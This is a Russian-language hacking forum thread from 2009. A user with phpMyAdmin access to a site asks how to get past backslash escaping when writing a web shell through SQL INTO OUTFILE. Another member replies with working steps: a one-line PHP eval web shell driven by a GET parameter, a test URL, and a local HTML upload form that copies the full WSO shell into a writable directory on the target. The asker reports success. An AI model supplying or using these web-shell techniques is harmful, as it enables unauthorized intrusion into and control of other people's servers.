ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
25.10.2009, 17:06
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
|
|
|
25.10.2009, 17:08
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от M1ks
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
что экранируется? Ты хотя бы <?phpinfo();?> можешь залить? Будет показываться phpinfo() ?
|
|
|
|
25.10.2009, 17:10
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от M1ks
outfile работает, но экранируется, админка на все есть.. нужно файл както залить, лью через пхпмайадм
омг, что значит работает, но екранизируется?
что экранизируеться?
излагай проблему подробно, дабы тебе смогли помочь.
|
|
|
|
25.10.2009, 17:11
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
|
|
|
|
25.10.2009, 17:12
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Если работает outfile, но файл не прочитать - может просто-напросто прав на чтение нет в этот каталог? О_о
Или то, что записывается - просто глюк.
|
|
|
|
25.10.2009, 17:13
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
|
|
|
|
25.10.2009, 17:15
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Сообщение от M1ks
записывается, но когда пытаюсь wso залить шел, ошибки
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
итд
Покажи запрос, которым заливаешь. Возможно, лишний слеш поставил.
|
|
|
|
25.10.2009, 17:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от M1ks
да, можно... кмд шел даже залил
там стоит
magic_quotes_sybase = On
добавляются \ в кавычках, я писал выше
тогда лей wso без html-вставок, последняя версия:
https://forum.antichat.ru/threadedpost1624918.html#post1624918
1. Заливаешь такой шелл:
<?eval(stripslashes($_GET[e]));?>
2. Проверяешь:
Код:
http://site.com/имя_твоего_шелла&e=phpinfo();
или
Код:
http://site.com/имя_твоего_шелла?e=phpinfo();
по разному бывает
3. У себя на компе такую локальную форму творишь (обзываешь .html):
Код:
<form action=http://site.com/имя_твоего_шелла&e=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/www/тут_полный_абсолютный_путь_до_папки_с_правами_на_запись/shell.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>
4. Запускаешь и льешь wso, всё
Последний раз редактировалось Pashkela; 25.10.2009 в 17:19..
|
|
|
|
25.10.2009, 17:18
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
SELECT 'код шелла' FROM `table` INTO OUTFILE 'путь'
|
|
|
|
25.10.2009, 17:25
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601
Репутация:
19
|
|
Pashkela.
Спасибо, получилось
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
